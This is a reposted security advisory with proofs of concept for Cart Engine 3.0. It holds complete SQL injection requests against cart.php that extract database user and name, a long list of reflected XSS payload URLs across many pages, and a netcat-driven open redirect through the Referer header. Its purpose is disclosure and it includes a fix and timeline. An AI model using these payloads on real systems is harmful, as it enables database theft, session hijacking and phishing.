Jump to content
Aerosol

Cart Engine 3.0 - Multiple Vulnerabilities

Recommended Posts

Posted

=== Details ===
Quantum Leap Advisory: http://www.quantumleap.it/cart-engine-3-0-multiple-vulnerabilities-sql-injection-reflected-xss-open-redirect/
Affected Product: Cart Engine
Version: 3.0

=== Executive Summary ===

SQL Injection: Using a specially crafted HTTP request, it is possible to exploit
a lack in the validation[1] of the “item_id[0]” and “item_id[]” input parameters
of cart.php page. Successful exploitation of the vulnerabilities results in read
sensitive data from the database and, in some cases, execute administration
operation on the database or issue commands to the operating system.

Reflected XSS: Using a specially crafted HTTP request, it is possible to exploit
a lack in the neutralization[2] of multiple pages output which includes the user
submitted content. Successful exploitation of the vulnerabilities, results in
the execution of arbitrary HTML and script code in the user’s browser in the context of
the victim user's session trough a “Reflected XSS”.

Open Redirect: Using a specially crafted HTTP request, it is possible to
redirect[3] the normal browsing of users to a malicious site by modifying
untrusted URL input in Referer HTTP header parameter in index.php, cart.php,
msg.php and page.php pages. Successful exploitation of the vulnerabilities
results in phishing scam, user credential theft, malware dissemination.

=== Proof of Concept ===

= SQL Injection (based on MySQL) =

A SQL Injection vulnerability has been detected on cart.php page in Cart Engine
CMS. The function “sql_query” in file “cart.php” doesn’t sanitize the “$item_id”
parameter, so error based and boolean-based blind or time-based blind SQL
Injection attacks can be executed.


## HTTP REQUEST - injection on item_id[0] parameter ##
POST /cart.php HTTP/1.1
Host: eshop.hacme.hac
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140722 Firefox/24.0 Iceweasel/24.7.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://eshop.hacme.hac/detail.php?item_id=8
Cookie: PHPSESSID=iost0tdmvdobp966rbppa514f3; ce3_history[0]=12; ce3_history[1]=8
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------109606523931762158449252347
Content-Length: 774

-----------------------------109606523931762158449252347
Content-Disposition: form-data; name="AXSRF_token"


-----------------------------109606523931762158449252347
Content-Disposition: form-data; name="cmd"

add
-----------------------------109606523931762158449252347
Content-Disposition: form-data; name="item_id[0]"

8' AND (SELECT 22 FROM (SELECT COUNT(*), CONCAT(0x3a,0x3a,(SELECT user()),0x3a,0x3a,FLOOR(RAND()*2))a FROM INFORMATION_SCHEMA.columns GROUP BY a) AND 'ql'='ql
-----------------------------109606523931762158449252347
Content-Disposition: form-data; name="qty[0]"

1
-----------------------------109606523931762158449252347
Content-Disposition: form-data; name="qty[0]"

1
-----------------------------109606523931762158449252347--
## EOF HTTP REQUEST ##

## HTTP REQUEST - injection on item_id[] parameter ##
POST /cart.php HTTP/1.1
Host: eshop.hacme.hac
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140722 Firefox/24.0 Iceweasel/24.7.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://eshop.hacme.hac/detail.php?item_id=13
Cookie: PHPSESSID=aci236dihehpjaldchbt6k6v23; ce3_history[0]=24; ce3_history[1]=13
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------1948855485207142787318084006
Content-Length: 2353

-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="AXSRF_token"


-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="cmd"

add
-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="item_id[0]"

13
-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="qty[0]"

1
-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="qty[0]"

1
-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="prod_opt_3"

3
-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="prod_opt_12"


-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="item_id[]"


-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="qty[]"

1
-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="item_id[]"

' AND (SELECT 22 FROM (SELECT COUNT(*), CONCAT(0x3a,0x3a,(SELECT database()),0x3a,0x3a,FLOOR(RAND()*2))a FROM INFORMATION_SCHEMA.columns GROUP BY a) AND 'ql'='ql
-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="qty[]"

1
-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="item_id[]"


-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="qty[]"

1
-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="item_id[]"


-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="qty[]"

1
-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="item_id[]"


-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="qty[]"

1
-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="item_id[]"


-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="qty[]"

1
-----------------------------1948855485207142787318084006--
## EOF HTTP REQUEST ##

= Reflected XSS =

A Reflected XSS vulnerability has been detected on multiple pages in Cart Engine
CMS. In the file "skins/default/outline.tpl", the parameter "path" in section
"drop down TOP menu (with path)" and the parameter "$print_this_page" in section
"footer_content_block" are not sanitized, so an XSS attack can be executed on
multiple pages.

## HTTP REQUESTS ##
/index.php?"><script>alert('XSS')<%2fscript>
/index.php?'%3balert('XSS')%2f%2f
/checkout.php?%27%3balert%28%27XSS%27%29%2f%2f
/checkout.php?%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/contact.php?"><script>alert('XSS')<%2fscript>
/contact.php?'%3balert('XSS')%2f%2f
/detail.php?item_id=10&'%3balert('XSS')%2f%2f
/detail.php?item_id=10&"><script>alert('XSS')<%2fscript>
/distro.php?'%3balert('XSS')%2f%2f
/distro.php?"><script>alert('XSS')<%2fscript>
/newsletter.php?'%3balert('XSS')%2f%2f
/newsletter.php?"><script>alert('XSS')<%2fscript>
/page.php?pid=2&"><script>alert('XSS')<%2fscript>
/page.php?pid=2&'%3balert('XSS')%2f%2f
/profile.php?"><script>alert('XSS')<%2fscript>
/profile.php?'%3balert('XSS')%2f%2f
/search.php?mod_id=_shop&cmd=list&cat_id=1&'%3balert('XSS')%2f%2f
/search.php?mod_id=_shop&cmd=list&cat_id=1&"><script>alert('XSS')<%2fscript>
/sitemap.php?'%3balert('XSS')%2f%2f
/sitemap.php?"><script>alert('XSS')<%2fscript>
/task.php?mod=qcomment&m=gbook&i=1&t=cy9NLS5Jys%2FPBgA%3D&"><script>alert('XSS')<%2fscript>
/task.php?mod=qcomment&m=gbook&i=1&t=cy9NLS5Jys%2FPBgA%3D&'%3balert('XSS')%2f%2f
/tell.php?'%3balert('XSS')%2f%2f
/tell.php?"><script>alert('XSS')<%2fscript>
## EOF HTTP REQUEST ##

= Open Redirect =

An Open Redirect vulnerability has been detected on multiple pages in Cart
Engine CMS. The function "redir" in file "includes/function.php" doesn't check
the "$_SERVER['HTTP_REFERER']" parameter, so an Open Redirect attack can be
executed.

## HTTP REQUEST ##
GET /page.php HTTP/1.1
Host: eshop.hacme.hac
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140722 Firefox/24.0 Iceweasel/24.7.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://www.google.com/search?hl=en&q=
Cookie: PHPSESSID=rtg5ooetpj7resie416iu9b2s6
Connection: close


$ cat openredirect.req | nc -vvv eshop.hacme.hac 80
hacme.hac [10.0.2.80] 80 (http) open
HTTP/1.1 302 Found
Date: Sun, 10 Aug 2014 15:16:34 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: http://www.google.com/search?hl=en&q=
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

sent 403, rcvd 380

=== Solution ===

Upgrade to Cart Engine 4.0.

=== Disclosure Timeline ===

2014-08-08 – Vulnerability Discovered
2014-08-10 – Initial vendor notification
2014-08-20 – The vendor fixed the vulnerability
2014-09-15 – Public advisory

=== References ===

[1] https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
[2] https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet
[3] https://www.owasp.org/index.php/Unvalidated_Redirects_and_Forwards_Cheat_Sheet

Source

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...